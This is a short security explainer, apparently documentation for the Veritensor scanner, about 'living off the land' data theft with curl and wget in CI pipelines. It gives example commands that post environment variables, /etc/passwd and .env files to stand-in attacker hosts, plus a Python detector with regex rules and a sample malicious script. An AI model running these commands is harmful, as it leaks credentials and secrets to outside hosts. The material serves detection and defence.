Data Exfiltration via Curl and Wget
Living off the Land
Attackers don't always install custom malware. They prefer "Living off the Land" (LotL)—using tools that are already installed on your server.
In Linux environments (including Docker containers and CI runners), curl and wget are almost always present.
The Exfiltration Pattern
An attacker who gains code execution (via a poisoned model or a bad dependency) wants to steal your secrets (AWS keys, ENV vars).
The simplest way is an HTTP request:
# Sending environment variables to a webhook
curl -X POST https://attacker.com/leak -d "$(env)"
Or using wget:
wget https://attacker.com/leak?data=$(cat /etc/passwd)
CI/CD Pipeline Risks
This pattern is extremely common in supply chain attacks on CI/CD. A malicious test script in a pull request might run:
curl -d @.env https://evil.com
If your pipeline has access to production secrets, they are gone in milliseconds.
Detection
Veritensor scans scripts (.sh, .py, .ipynb) for suspicious usage of these tools.
- We look for curl or wget combined with environment variables or sensitive file paths.
- We flag usage of known "leak bin" domains (like pastebin, requestbin).
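The two checks above can be sketched as a small line-based scanner. This is an added example, not Veritensor's own code: the rule names, regexes and the sample script are assumptions made for illustration, and the hosts use the reserved .example TLD.

```python
import re

# Assumed heuristics for illustration; not Veritensor's actual rule set.
TOOL = re.compile(r"(?<![\w-])(curl|wget)(?![\w-])")
RULES = [
    ("env-dump", re.compile(r"(\$\(|`)\s*(env|printenv)\b")),
    ("secret-env-var", re.compile(r"\$\{?[A-Z_]*(SECRET|TOKEN|KEY|PASSWORD)")),
    ("sensitive-file", re.compile(r"/etc/(passwd|shadow)|\.env\b|\.aws/credentials")),
    ("leak-bin-domain", re.compile(r"https?://[^\s\"'/]*(pastebin|requestbin)", re.I)),
]

# Constructed sample script; hosts use the reserved .example TLD.
SAMPLE = r'''#!/bin/sh
# curl -d "$(env)" in a comment must not be flagged
curl -sSL https://pypi.org/simple/requests/ -o index.html
curl -X POST https://collector.example/leak -d "$(env)"
wget "https://collector.example/leak?data=$(cat /etc/passwd)"
curl -d @.env \
     https://collector.example
curl -H "Authorization: Bearer $AWS_SECRET_ACCESS_KEY" https://api.example/v1
wget -q https://requestbin.example/r/abc123
'''

def logical_lines(script):
    """Yield (first_line_no, text), joining backslash-continued lines."""
    buf, start = "", 0
    for no, raw in enumerate(script.splitlines(), 1):
        if not buf:
            start = no
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf = ""
    if buf:
        yield start, buf

def scan(script):
    """Return [(line_no, rule)] for curl/wget commands that touch secrets."""
    findings = []
    for no, line in logical_lines(script):
        code = line.strip()
        if code.startswith("#") or not TOOL.search(code):
            continue  # skip comments and lines without an HTTP client
        findings += [(no, name) for name, pat in RULES if pat.search(code)]
    return findings

if __name__ == "__main__":
    for no, rule in scan(SAMPLE):
        print(f"line {no}: {rule}")
```

Pattern matching like this is a review aid: the `secret-env-var` hit on the Authorization header shows the kind of finding that needs a human decision, and obfuscated commands will not match at all, which is why it is paired with egress filtering.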
Mitigation
- Egress Filtering: Configure your firewall to allow outbound connections only to trusted domains (e.g., PyPI, Hugging Face, AWS). Block everything else.
- Static Analysis: Use Veritensor to catch these commands in code reviews before they merge.